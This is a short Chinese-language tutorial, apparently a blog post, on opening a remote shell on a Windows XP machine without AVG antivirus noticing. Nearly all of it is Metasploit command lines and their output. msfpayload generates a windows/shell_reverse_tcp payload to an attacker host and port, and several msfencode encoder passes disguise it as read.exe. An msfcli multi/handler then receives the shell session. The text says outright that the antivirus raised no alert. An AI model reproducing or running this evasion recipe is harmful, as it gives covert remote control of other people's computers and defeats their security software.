metasploit启动远程shell而不被杀毒软件发现

root@bt:~# time msfpayload windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o read.exe[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 368 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 395 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 422 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 449 (iteration=5)[*] x86/alpha_upper succeeded with size 966 (iteration=1)[*] x86/alpha_upper succeeded with size 2000 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2029 (iteration=1)[*] x86/shikata_ga_nai succeeded with size 2058 (iteration=2)[*] x86/shikata_ga_nai succeeded with size 2087 (iteration=3)[*] x86/shikata_ga_nai succeeded with size 2116 (iteration=4)[*] x86/shikata_ga_nai succeeded with size 2145 (iteration=5)[*] x86/countdown succeeded with size 2163 (iteration=1)[*] x86/countdown succeeded with size 2181 (iteration=2)[*] x86/countdown succeeded with size 2199 (iteration=3)[*] x86/countdown succeeded with size 2217 (iteration=4)[*] x86/countdown succeeded with size 2235 (iteration=5)real    1m33.468suser    0m52.195ssys     0m39.830sroot@bt:~#

把read.exe上传到XP，然后在cmd运行，杀毒软件没报告威胁：

Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp.C:\Documents and Settings\Administrator>cd ..C:\Documents and Settings>cd ..C:\>read.exe

然后输入命令：

root@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.11 LPORT=31337 E[*] Please wait while we load the module tree...# cowsay++ ____________< metasploit > ------------       \   ,__,        \  (oo)____           (__)    )\              ||--|| *       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]+ -- --=[ 927 exploits - 499 auxiliary - 151 post+ -- --=[ 251 payloads - 28 encoders - 8 nopsPAYLOAD => windows/shell_reverse_tcpLHOST => 192.168.1.11LPORT => 31337[*] Started reverse handler on 192.168.1.11:31337 [*] Starting the payload handler...[*] Command shell session 1 opened (192.168.1.11:31337 -> 192.168.1.142:1181) at 2013-04-28 06:06:36 -0400Microsoft Windows XP [版本 5.1.2600](C) 版权所有 1985-2001 Microsoft Corp.C:\>dirdir 驱动器 C 中的卷没有标签。 卷的序列号是 3052-FA52 C:\ 的目录2012-03-24  11:55                 0 AUTOEXEC.BAT2013-04-28  16:06       131,820,480 avg_free_x86_all_2013.exe2012-03-24  11:55                 0 CONFIG.SYS2012-03-24  11:59    <DIR>          Documents and Settings2013-04-28  17:08    <DIR>          Program Files2013-04-29  22:17            73,802 read.exe2013-04-28  21:37                38 readme.txt2013-04-28  15:19    <DIR>          ruby2013-04-28  20:45    <DIR>          WINDOWS               5 个文件    131,894,320 字节               4 个目录  5,329,256,448 可用字节C:\>

这样就打开了一个远程的shell，并且没有“惊动”avg这个杀毒软件。